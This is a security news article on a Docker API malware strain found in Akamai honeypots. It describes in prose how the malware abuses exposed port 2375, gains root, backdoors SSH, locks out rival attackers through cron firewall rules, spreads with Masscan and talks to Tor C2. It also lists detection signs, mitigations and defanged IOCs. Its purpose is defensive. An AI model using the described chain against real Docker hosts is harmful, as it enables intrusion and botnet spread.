A new strain of malware has been identified in Akamai Hunt’s honeypot infrastructure that targets misconfigured Docker APIs to gain full root access and establish long-term persistence.
First observed in August 2025, this variant diverges significantly from the June 2025 Trend Micro discovery by blocking other attackers’ access, embedding multiple infection tools, and preparing the foundation for a potentially distributed botnet.
Attack Chain and Capabilities
The attack begins with an HTTP POST request to the Docker daemon’s remote API (port 2375), instructing it to spin up an Alpine Linux container with the host’s filesystem mounted.
The container executes a Base64-encoded shell command that installs curl and Tor, fetches a secondary script from a Tor hidden service, and modifies the host’s SSH configuration to permit root login and add a malicious public key for backdoor access.
A cron job is then written to the host’s /etc/crontab, looping through firewall utilities (firewall-cmd, ufw, pfctl, iptables, nft) to block port 2375, effectively locking out any subsequent API requests and ensuring exclusive attacker control.
Once persistence is achieved, the container reports the compromised host to its command-and-control (C2) server over Tor. It downloads and executes a compressed dropper binary, which unpacks a Go-based dropper that embeds additional tools.
After parsing active user sessions via the utmp file, it launches Masscan to search for other exposed Docker APIs on port 2375. Detected hosts are targeted in the same manner, propagating the infection.
Though the binary includes dormant logic for Telnet (port 23) and Chromium remote debugging (port 9222) exploits using default device credentials and the chromedp library, respectively, these routines are not invoked in the current build, indicating planned future expansion.
Detection and Mitigation
Defenders can identify this threat by monitoring for newly created containers that install package managers (apk, apt, yum) followed by immediate use of curl or wget.
Unusual Base64 command execution, Tor-bound connections to .onion domains, and abrupt cessation of services listening on critical ports (2375, 9222, 23) are key indicators.
Additional signs include host-mounted containers accessing /etc or /var/run/docker.sock, and cron entries that manipulate firewall rules.
Mitigation strategies focus on reducing attack surface and enforcing network hygiene:
– Isolate Docker hosts behind internal firewalls and apply network segmentation to limit lateral movement.
– Restrict exposure of the Docker API, Chrome DevTools port, and Telnet service to trusted management networks only.
– Enforce strong credential policies and rotate default passwords on all devices.
– Implement host-based monitoring to alert on unauthorized additions to SSH authorized_keys and changes to crontab.
By combining proactive threat hunting with strict API access controls and segmentation, organizations can neutralize emerging Docker-based threats before they escalate.
IOCs
| IOC | Type |
|---|---|
| wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion | Domain |
| 2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd[.]onion | Domain |
| webhook[.]site/4fea5cbb-8863-4f25-862a-fd8f02095207 | URL |
| C38e013ed9aa1ef46411bef9605f7a41823f3eefebb8b30b9e35f39723c14d7c – docker-init.sh | Hash |
| 649974453ed40b72d08d378d72d43161ed5bd093a4f80eb5285f75e16fedbeb2 – system | Hash |
| 9451d3dc4b0ff9ea6afa503ffbfcd877944cac0860d6a0b8779c2bb5d03d3446 – dockerd | Hash |
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
